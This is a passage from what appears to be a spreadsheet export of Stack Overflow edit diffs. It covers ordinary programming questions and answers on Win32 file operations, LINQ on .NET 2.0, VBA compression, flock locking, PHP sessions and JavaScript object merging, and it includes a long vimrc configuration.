 &lt;p&gt; &lt;span class="diff-add"&gt;Win32&lt;/span&gt; does not guarantee atomic file &lt;span class="diff-add"&gt;meta data&lt;/span&gt; operations. &lt;span class="diff-add"&gt; I'd&lt;/span&gt; provide a citation, but there is none - that fact that there's no written or documented guarantee means as much.&lt;/p&gt; _x000D_
 &lt;p&gt; You're going to have to write your own routines to support this. &lt;span class="diff-add"&gt; It's&lt;/span&gt; unfortunate, but you can't expect &lt;span class="diff-add"&gt;win32&lt;/span&gt; to provide this level of service - it simply wasn't designed for it.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt;-Adam&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Adam Davis</t>
  </si>
  <si>
    <t>isanae</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;EDITED WITH ANSWER&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I have &lt;span class="diff-delete"&gt;been able to prove that you can&lt;/span&gt; in &lt;span class="diff-delete"&gt;fact get LINQ to work running on&lt;/span&gt; a &lt;span class="diff-delete"&gt;2&lt;/span&gt;.&lt;span class="diff-delete"&gt;0 sp1 server&lt;/span&gt;. &lt;span class="diff-delete"&gt; It will not work at all&lt;/span&gt; without &lt;span class="diff-delete"&gt;at least&lt;/span&gt; 2.0 &lt;span class="diff-delete"&gt;SP1&lt;/span&gt;.&lt;span class="diff-delete"&gt; But all you need&lt;/span&gt; is to &lt;span class="diff-delete"&gt;include the following assemblies in your project&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;System.Core.dll System.Data.DataExtensions.dll System.Data&lt;/span&gt;.&lt;span class="diff-delete"&gt;Linq&lt;/span&gt;.&lt;span class="diff-delete"&gt;dll System&lt;/span&gt;.&lt;span class="diff-delete"&gt;Web&lt;/span&gt;.&lt;span class="diff-delete"&gt;Extensions&lt;/span&gt;.&lt;span class="diff-delete"&gt;dll&lt;/span&gt; &lt;span class="diff-delete"&gt;System.Xml&lt;/span&gt;.&lt;span class="diff-delete"&gt;Linq&lt;/span&gt;.&lt;span class="diff-delete"&gt;dll&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I can't seem to get my application up and running on my dev server and I'm not sure why.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I have &lt;span class="diff-add"&gt;compiled my code&lt;/span&gt; in &lt;span class="diff-add"&gt;VS 2008 with&lt;/span&gt; a &lt;span class="diff-add"&gt;target framework of 3&lt;/span&gt;.&lt;span class="diff-add"&gt;5&lt;/span&gt;. &lt;span class="diff-add"&gt; I am using 3.5 mainly because I have implemented LINQ rather extensively. Compiling and runs local&lt;/span&gt; without &lt;span class="diff-add"&gt;any problems.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; The hang up is that my server only has the&lt;/span&gt; 2.0 .&lt;span class="diff-add"&gt;Net framework and upgrading to 3.5&lt;/span&gt; is&lt;span class="diff-add"&gt; apparently not going&lt;/span&gt; to &lt;span class="diff-add"&gt;happen&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I was under the impression after doing some research that as long as I was trying to execute compiled code the server would not need 3&lt;/span&gt;.&lt;span class="diff-add"&gt;5 installed&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Today I am trying to publish to the server and I can't get past this error in my WEB&lt;/span&gt;.&lt;span class="diff-add"&gt;CONFIG&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Configuration Error&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Parser Error Message: Child nodes not allowed&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; providerOption name="CompilerVersion" value="v3&lt;/span&gt;.&lt;span class="diff-add"&gt;5"/&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT ADD ON QUESTION:&lt;/span&gt; &lt;span class="diff-add"&gt;I have seen some posts about possibly setting my references to "copy local" which might allow me to run on the 2&lt;/span&gt;.&lt;span class="diff-add"&gt;0 server&lt;/span&gt;.&lt;span class="diff-add"&gt; Thoughts?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jeroen</t>
  </si>
  <si>
    <t>Collin Estes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to be able to GZip compress a file in an Excel VBA function. Specifically I need to be able to use the 'deflate' algorithm&lt;span class="diff-delete"&gt;.&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a way to do this without having to exec a command line application? With no dependency on external tools the code will be more robust.&lt;/p&gt; _x000D_
 &lt;p&gt; Ideally the code would make use of pre-installed VBA or COM library functions - I don't want to have to implement this logic myself or install DLLs etc.&lt;/p&gt; _x000D_
 &lt;p&gt; If possible, I want installation of the function to be as simple as adding a .xla to the available Excel Add-Ins. No DLLs, EXEs, registry entries etc. required.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to be able to GZip compress a file in an Excel VBA function. Specifically I need to be able to use the 'deflate' algorithm.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a way to do this without having to exec a command line application? With no dependency on external tools the code will be more robust.&lt;/p&gt; _x000D_
 &lt;p&gt; Ideally the code would make use of pre-installed VBA or COM library functions - I don't want to have to implement this logic myself or install DLLs etc.&lt;/p&gt; _x000D_
 &lt;p&gt; If possible, I want installation of the function to be as simple as adding a .xla to the available Excel Add-Ins. No DLLs, EXEs, registry entries etc. required.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Matthew Murdoch</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I recently needed to solve exactly this problem in an app. I ended up using this great little jQuery plugin to do the trick: &lt;a href="http://www.sfpeter.com/2008/03/13/communication-between-browser-windows-with-jquery-my-new-plugin/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;WindowMsg&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;. While&lt;/span&gt; I'm sure there are other ways to accomplish the same task, that plugin does works thusly:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; first you create a new child window from your original window using window.open&lt;/li&gt; _x000D_
  &lt;li&gt; you save a reference to the window object returned by window.open&lt;/li&gt; _x000D_
  &lt;li&gt; you call a library method in the child window that adds a hidden form for the library to store data in&lt;/li&gt; _x000D_
  &lt;li&gt; you call a library method in the parent window that uses window.document.forms to populate form fields on the child window (the library abstracts all of this stuff so you wouldn't even know there was a form involved unless you looked at the source) window.document.forms works the same on all major browsers so this abstraction in x-browser compatible&lt;/li&gt; _x000D_
  &lt;li&gt; finally, the child window refers back to its parent window using window.opener and can communicate back via a parallel hidden form on the parent&lt;/li&gt; _x000D_
  &lt;li&gt; the library implements a convenient helper that takes a callback function to run on each side to make the callback chain easy to deal with&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In my experience working with the library, it would have also been quite nice if they had included the JSON 2 lib from JSON.org. Out of the box, WindowMsg only allows you to send string messages between windows, but with some pretty simple use of the JSON 2 lib, I was able to hack it to allow the sending of full JSON objects between windows. I bet more mature libraries (such as whatever google uses) include that kind of serialization and de-serialization baked in.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I recently needed to solve exactly this problem in an app. I ended up using this great little jQuery plugin to do the trick:&lt;span class="diff-add"&gt; WindowMsg&lt;/span&gt; &lt;span class="diff-add"&gt;(see link at bottom) While&lt;/span&gt; I'm sure there are other ways to accomplish the same task, that plugin does works thusly:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; first you create a new child window from your original window using window.open&lt;/li&gt; _x000D_
  &lt;li&gt; you save a reference to the window object returned by window.open&lt;/li&gt; _x000D_
  &lt;li&gt; you call a library method in the child window that adds a hidden form for the library to store data in&lt;/li&gt; _x000D_
  &lt;li&gt; you call a library method in the parent window that uses window.document.forms to populate form fields on the child window (the library abstracts all of this stuff so you wouldn't even know there was a form involved unless you looked at the source) window.document.forms works the same on all major browsers so this abstraction in x-browser compatible&lt;/li&gt; _x000D_
  &lt;li&gt; finally, the child window refers back to its parent window using window.opener and can communicate back via a parallel hidden form on the parent&lt;/li&gt; _x000D_
  &lt;li&gt; the library implements a convenient helper that takes a callback function to run on each side to make the callback chain easy to deal with&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In my experience working with the library, it would have also been quite nice if they had included the JSON 2 lib from JSON.org. Out of the box, WindowMsg only allows you to send string messages between windows, but with some pretty simple use of the JSON 2 lib, I was able to hack it to allow the sending of full JSON objects between windows. I bet more mature libraries (such as whatever google uses) include that kind of serialization and de-serialization baked in.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I am putting this link here because for some reason, the Stack Overflow formatter turns it into an anchor link with no closing tag and I don't want my whole post to be one giant hyperlink!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; WindowMsg: &lt;/span&gt;&lt;a href="http://www.sfpeter.com/2008/03/13/communication-between-browser-windows-with-jquery-my-new-plugin/" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://www.sfpeter.com/2008/03/13/communication-between-browser-windows-with-jquery-my-new-plugin/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use &lt;a href="http://linux.die.net/man/1/flock" rel="nofollow noreferrer"&gt;&lt;code&gt;flock(1)&lt;/code&gt;&lt;/a&gt; to make an exclusive scoped lock a on file descriptor. This way you can even synchronize different parts of the script.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#!/bin/bash_x000D_
_x000D_
(_x000D_
  # Wait for lock on /var/lock/.myscript.exclusivelock (fd 200) for 10 seconds_x000D_
  flock -x -w 10 200 || exit 1_x000D_
  _x000D_
  # Do stuff_x000D_
  _x000D_
) 200&amp;gt;/var/lock/.myscript.exclusivelock_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This ensures that code between "(" and ")" is run only by one process at a time and that the process doesn't wait too long for a lock.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use &lt;a href="http://linux.die.net/man/1/flock" rel="nofollow noreferrer"&gt;&lt;code&gt;flock(1)&lt;/code&gt;&lt;/a&gt; to make an exclusive scoped lock a on file descriptor. This way you can even synchronize different parts of the script.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#!/bin/bash_x000D_
_x000D_
(_x000D_
  # Wait for lock on /var/lock/.myscript.exclusivelock (fd 200) for 10 seconds_x000D_
  flock -x -w 10 200 || exit 1_x000D_
  _x000D_
  # Do stuff_x000D_
  _x000D_
) 200&amp;gt;/var/lock/.myscript.exclusivelock_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This ensures that code between "(" and ")" is run only by one process at a time and that the process doesn't wait too long for a lock.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Caveat: this particular command is a part of &lt;/span&gt;&lt;a href="http://userweb.kernel.org/%7Ekzak/util-linux-ng/" rel="nofollow noreferrer"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;util-linux-ng&lt;/span&gt;&lt;/code&gt;&lt;/a&gt;&lt;span class="diff-add"&gt;. If you run an operating system other than Linux, it may or may not be available.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jared Burrows</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an API that is dependent on state information between requests. As an easy first version of the code, I am simply using PHP &lt;span class="diff-delete"&gt;sessions&lt;/span&gt; to store the state information instead of something more advanced (APC, memcache, DB). Throughout my initial testing in a web browser, everything worked perfectly. However, it seems that when clients try to connect through non-browser methods such as Curl or wget, the state information is not being preserved.&lt;/p&gt; _x000D_
 &lt;p&gt; Will a PHP session only be created if a browser is requesting the page? I am explicitly starting the session with session_start() as well as naming it before hand with session_name().&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have an API that is dependent on&lt;span class="diff-add"&gt; certain&lt;/span&gt; state information between requests. As an easy first version of the code, I am simply using PHP &lt;span class="diff-add"&gt;session's&lt;/span&gt; to store the state information instead of something more advanced (APC, memcache, DB). Throughout my initial testing in a web browser, everything worked perfectly. However, it seems that when clients try to connect through non-browser methods such as Curl or wget, the state information is not being preserved.&lt;/p&gt; _x000D_
 &lt;p&gt; Will a PHP session only be created if a browser is requesting the page? I am explicitly starting the session with session_start() as well as naming it before hand with session_name().&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jW.</t>
  </si>
  <si>
    <t>James A. Rosen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to be able to merge two (very simple) JavaScript objects at runtime. For example I'd like to:&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var obj1 = { food: 'pizza', car: 'ford' }_x000D_
var obj2 = { animal: 'dog' }_x000D_
_x000D_
obj1.merge(obj2);_x000D_
_x000D_
//obj1 now has three properties: food, car, and animal_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Does anyone have a script for this or know of a built in way to do this? I do not need recursion, and I do not need to merge functions, just methods on flat objects.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to be able to merge two (very simple) JavaScript objects at runtime. For example I'd like to:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var obj1 = { food: 'pizza', car: 'ford' }_x000D_
var obj2 = { animal: 'dog' }_x000D_
_x000D_
obj1.merge(obj2);_x000D_
_x000D_
//obj1 now has three properties: food, car, and animal_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Does anyone have a script for this or know of a built in way to do this? I do not need recursion, and I do not need to merge functions, just methods on flat objects.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bugs</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (attrname &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; obj2) { obj1[attrname] = obj2[attrname]; }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you're using a framework that &lt;span class="diff-delete"&gt;tramples&lt;/span&gt; all over your prototypes then you have to get fancier with checks like &lt;code&gt;hasOwnProperty&lt;/code&gt;, but that code will work for 99% of cases.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;for&lt;/span&gt; (attrname &lt;span class="hljs-keyword"&gt;in&lt;/span&gt; obj2) { obj1[attrname] = obj2[attrname]; }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; If you're using a framework that &lt;span class="diff-add"&gt;shits&lt;/span&gt; all over your prototypes then you have to get fancier with checks like &lt;code&gt;hasOwnProperty&lt;/code&gt;, but that code will work for 99% of cases.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JasonSmith</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;int x = n / 3;  // &amp;lt;-- make this faster_x000D_
_x000D_
// for instance_x000D_
_x000D_
int a = n * 3; // &amp;lt;-- normal integer multiplication_x000D_
_x000D_
int b = (n &amp;lt;&amp;lt; 1) + n; // &amp;lt;-- potentially faster multiplication_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;//&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;int x = n / 3;  // &amp;lt;-- make this faster_x000D_
_x000D_
// for instance_x000D_
_x000D_
int a = n * 3; // &amp;lt;-- normal integer multiplication_x000D_
_x000D_
int b = (n &amp;lt;&amp;lt; 1) + n; // &amp;lt;-- potentially faster multiplication_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Greg Dean</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I like the &lt;a href="http://framework.zend.com/manual/current/en/modules/zend.ldap.introduction.html%E2%80%8C" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Zend_Ldap&lt;/span&gt;&lt;/a&gt; Class, you can use only this class in your project, without the Zend Framework.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I like the &lt;a href="http://framework.zend.com/manual/en/zend.ldap.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Zend_Ldap&lt;/span&gt;&lt;/a&gt; Class, you can use only this class in your project, without the Zend Framework.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ryan McCullagh</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-delete"&gt;_x000D_
"{{{Auto Commands_x000D_
_x000D_
" Automatically cd into the directory that the file is in_x000D_
autocmd BufEnter * execute "chdir ".escape(expand("%:p:h"), ' ')_x000D_
_x000D_
" Remove any trailing whitespace that is in the file_x000D_
autocmd BufRead,BufWrite * if ! &amp;amp;bin | silent! %s/\s\+$//ge | endif_x000D_
_x000D_
" Restore cursor position to where it was before_x000D_
augroup JumpCursorOnEdit_x000D_
   au!_x000D_
   autocmd BufReadPost *_x000D_
            \ if expand(":p:h") !=? $TEMP |_x000D_
            \   if line("'\"") &amp;gt; 1 &amp;amp;&amp;amp; line("'\"")  foldlevel(JumpCursorOnEdit_foo - 1)) |_x000D_
            \        let JumpCursorOnEdit_foo = JumpCursorOnEdit_foo - 1 |_x000D_
            \        let b:doopenfold = 2 |_x000D_
            \     endif |_x000D_
            \     exe JumpCursorOnEdit_foo |_x000D_
            \   endif |_x000D_
            \ endif_x000D_
   " Need to postpone using "zv" until after reading the modelines._x000D_
   autocmd BufWinEnter *_x000D_
            \ if exists("b:doopenfold") |_x000D_
            \   exe "normal zv" |_x000D_
            \   if(b:doopenfold &amp;gt; 1) |_x000D_
            \       exe  "+".1 |_x000D_
            \   endif |_x000D_
            \   unlet b:doopenfold |_x000D_
            \ endif_x000D_
augroup END_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{Misc Settings_x000D_
_x000D_
" Necesary  for lots of cool vim things_x000D_
set nocompatible_x000D_
_x000D_
" This shows what you are typing as a command.  I love this!_x000D_
set showcmd_x000D_
_x000D_
" Folding Stuffs_x000D_
set foldmethod=marker_x000D_
_x000D_
" Needed for Syntax Highlighting and stuff_x000D_
filetype on_x000D_
filetype plugin on_x000D_
syntax enable_x000D_
set grepprg=grep\ -nH\ $*_x000D_
_x000D_
" Who doesn't like autoindent?_x000D_
set autoindent_x000D_
_x000D_
" Spaces are better than a tab character_x000D_
set expandtab_x000D_
set smarttab_x000D_
_x000D_
" Who wants an 8 character tab?  Not me!_x000D_
set shiftwidth=3_x000D_
set softtabstop=3_x000D_
_x000D_
" Use english for spellchecking, but don't spellcheck by default_x000D_
if version &amp;gt;= 700_x000D_
   set spl=en spell_x000D_
   set nospell_x000D_
endif_x000D_
_x000D_
" Real men use gcc_x000D_
"compiler gcc_x000D_
_x000D_
" Cool tab completion stuff_x000D_
set wildmenu_x000D_
set wildmode=list:longest,full_x000D_
_x000D_
" Enable mouse support in console_x000D_
set mouse=a_x000D_
_x000D_
" Got backspace?_x000D_
set backspace=2_x000D_
_x000D_
" Line Numbers PWN!_x000D_
set number_x000D_
_x000D_
" Ignoring case is a fun trick_x000D_
set ignorecase_x000D_
_x000D_
" And so is Artificial Intellegence!_x000D_
set smartcase_x000D_
_x000D_
" This is totally awesome - remap jj to escape in insert mode.  You'll never type jj anyway, so it's great!_x000D_
inoremap jj &amp;lt;Esc&amp;gt;_x000D_
_x000D_
nnoremap JJJJ &amp;lt;Nop&amp;gt;_x000D_
_x000D_
" Incremental searching is sexy_x000D_
set incsearch_x000D_
_x000D_
" Highlight things that we find with the search_x000D_
set hlsearch_x000D_
_x000D_
" Since I use linux, I want this_x000D_
let g:clipbrdDefaultReg = '+'_x000D_
_x000D_
" When I close a tab, remove the buffer_x000D_
set nohidden_x000D_
_x000D_
" Set off the other paren_x000D_
highlight MatchParen ctermbg=4_x000D_
" }}}_x000D_
_x000D_
"{{{Look and Feel_x000D_
_x000D_
" Favorite Color Scheme_x000D_
if has("gui_running")_x000D_
   colorscheme inkpot_x000D_
   " Remove Toolbar_x000D_
   set guioptions-=T_x000D_
   "Terminus is AWESOME_x000D_
   set guifont=Terminus\ 9_x000D_
else_x000D_
   colorscheme metacosm_x000D_
endif_x000D_
_x000D_
"Status line gnarliness_x000D_
set laststatus=2_x000D_
set statusline=%F%m%r%h%w\ (%{&amp;amp;ff}){%Y}\ [%l,%v][%p%%]_x000D_
_x000D_
" }}}_x000D_
_x000D_
"{{{ Functions_x000D_
_x000D_
"{{{ Open URL in browser_x000D_
_x000D_
function! Browser ()_x000D_
   let line = getline (".")_x000D_
   let line = matchstr (line, "http[^   ]*")_x000D_
   exec "!konqueror ".line_x000D_
endfunction_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{Theme Rotating_x000D_
let themeindex=0_x000D_
function! RotateColorTheme()_x000D_
   let y = -1_x000D_
   while y == -1_x000D_
      let colorstring = "inkpot#ron#blue#elflord#evening#koehler#murphy#pablo#desert#torte#"_x000D_
      let x = match( colorstring, "#", g:themeindex )_x000D_
      let y = match( colorstring, "#", x + 1 )_x000D_
      let g:themeindex = x + 1_x000D_
      if y == -1_x000D_
         let g:themeindex = 0_x000D_
      else_x000D_
         let themestring = strpart(colorstring, x + 1, y - x - 1)_x000D_
         return ":colorscheme ".themestring_x000D_
      endif_x000D_
   endwhile_x000D_
endfunction_x000D_
" }}}_x000D_
_x000D_
"{{{ Paste Toggle_x000D_
let paste_mode = 0 " 0 = normal, 1 = paste_x000D_
_x000D_
func! Paste_on_off()_x000D_
   if g:paste_mode == 0_x000D_
      set paste_x000D_
      let g:paste_mode = 1_x000D_
   else_x000D_
      set nopaste_x000D_
      let g:paste_mode = 0_x000D_
   endif_x000D_
   return_x000D_
endfunc_x000D_
"}}}_x000D_
_x000D_
"{{{ Todo List Mode_x000D_
_x000D_
function! TodoListMode()_x000D_
   e ~/.todo.otl_x000D_
   Calendar_x000D_
   wincmd l_x000D_
   set foldlevel=1_x000D_
   tabnew ~/.notes.txt_x000D_
   tabfirst_x000D_
   " or 'norm! zMzr'_x000D_
endfunction_x000D_
_x000D_
"}}}_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{ Mappings_x000D_
_x000D_
" Open Url on this line with the browser \w_x000D_
map w :call Browser ()_x000D_
_x000D_
" Open the Project Plugin _x000D_
nnoremap   :Project_x000D_
_x000D_
" Open the Project Plugin_x000D_
nnoremap  pal  :Project .vimproject_x000D_
_x000D_
" TODO Mode_x000D_
nnoremap  todo :execute TodoListMode()_x000D_
_x000D_
" Open the TagList Plugin _x000D_
nnoremap   :Tlist_x000D_
_x000D_
" Next Tab_x000D_
nnoremap   :tabnext_x000D_
_x000D_
" Previous Tab_x000D_
nnoremap   :tabprevious_x000D_
_x000D_
" New Tab_x000D_
nnoremap   :tabnew_x000D_
_x000D_
" Rotate Color Scheme _x000D_
nnoremap   :execute RotateColorTheme()_x000D_
_x000D_
" DOS is for fools._x000D_
nnoremap   :%s/$//g:%s// /g_x000D_
_x000D_
" Paste Mode!  Dang! _x000D_
nnoremap   :call Paste_on_off()_x000D_
set pastetoggle=_x000D_
_x000D_
" Edit vimrc \ev_x000D_
nnoremap  ev :tabnew:e ~/.vimrc_x000D_
_x000D_
" Edit gvimrc \gv_x000D_
nnoremap  gv :tabnew:e ~/.gvimrc_x000D_
_x000D_
" Up and down are more logical with g.._x000D_
nnoremap  k gk_x000D_
nnoremap  j gj_x000D_
inoremap   gka_x000D_
inoremap   gja_x000D_
_x000D_
" Good call Benjie (r for i)_x000D_
nnoremap   i r_x000D_
nnoremap   a r_x000D_
_x000D_
" Create Blank Newlines and stay in Normal mode_x000D_
nnoremap  zj o_x000D_
nnoremap  zk O_x000D_
_x000D_
" Space will toggle folds!_x000D_
nnoremap  za_x000D_
_x000D_
" Search mappings: These will make it so that going to the next one in a_x000D_
" search will center on the line it's found in._x000D_
map N Nzz_x000D_
map n nzz_x000D_
_x000D_
" Testing_x000D_
set completeopt=longest,menuone,preview_x000D_
_x000D_
inoremap   pumvisible() ? "\" : "\u\"_x000D_
inoremap   pumvisible() ? "\c-n&amp;gt;" : "\c-n&amp;gt;\c-r&amp;gt;=pumvisible() ? \"\\down&amp;gt;\" : \"\"\cr&amp;gt;"_x000D_
inoremap   pumvisible() ? "\c-n&amp;gt;" : "\c-x&amp;gt;\c-o&amp;gt;\c-n&amp;gt;\c-p&amp;gt;\c-r&amp;gt;=pumvisible() ? \"\\down&amp;gt;\" : \"\"\cr&amp;gt;"_x000D_
_x000D_
" Swap ; and :  Convenient._x000D_
nnoremap ; :_x000D_
nnoremap : ;_x000D_
_x000D_
" Fix email paragraphs_x000D_
nnoremap par :%s/^&amp;gt;$//_x000D_
_x000D_
"ly$O#{{{ "lpjjj_%A#}}}jjzajj_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{Taglist configuration_x000D_
let Tlist_Use_Right_Window = 1_x000D_
let Tlist_Enable_Fold_Column = 0_x000D_
let Tlist_Exit_OnlyWindow = 1_x000D_
let Tlist_Use_SingleClick = 1_x000D_
let Tlist_Inc_Winwidth = 0_x000D_
"}}}_x000D_
_x000D_
let g:rct_completion_use_fri = 1_x000D_
"let g:Tex_DefaultTargetFormat = "pdf"_x000D_
let g:Tex_ViewRule_pdf = "kpdf"_x000D_
_x000D_
filetype plugin indent on_x000D_
syntax on_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;"{{{Auto Commands_x000D_
_x000D_
" Automatically cd into the directory that the file is in_x000D_
autocmd BufEnter * execute "chdir ".escape(expand("%:p:h"), ' ')_x000D_
_x000D_
" Remove any trailing whitespace that is in the file_x000D_
autocmd BufRead,BufWrite * if ! &amp;amp;bin | silent! %s/\s\+$//ge | endif_x000D_
_x000D_
" Restore cursor position to where it was before_x000D_
augroup JumpCursorOnEdit_x000D_
   au!_x000D_
   autocmd BufReadPost *_x000D_
            \ if expand("&amp;lt;afile&amp;gt;:p:h") !=? $TEMP |_x000D_
            \   if line("'\"") &amp;gt; 1 &amp;amp;&amp;amp; line("'\"") &amp;lt;= line("$") |_x000D_
            \     let JumpCursorOnEdit_foo = line("'\"") |_x000D_
            \     let b:doopenfold = 1 |_x000D_
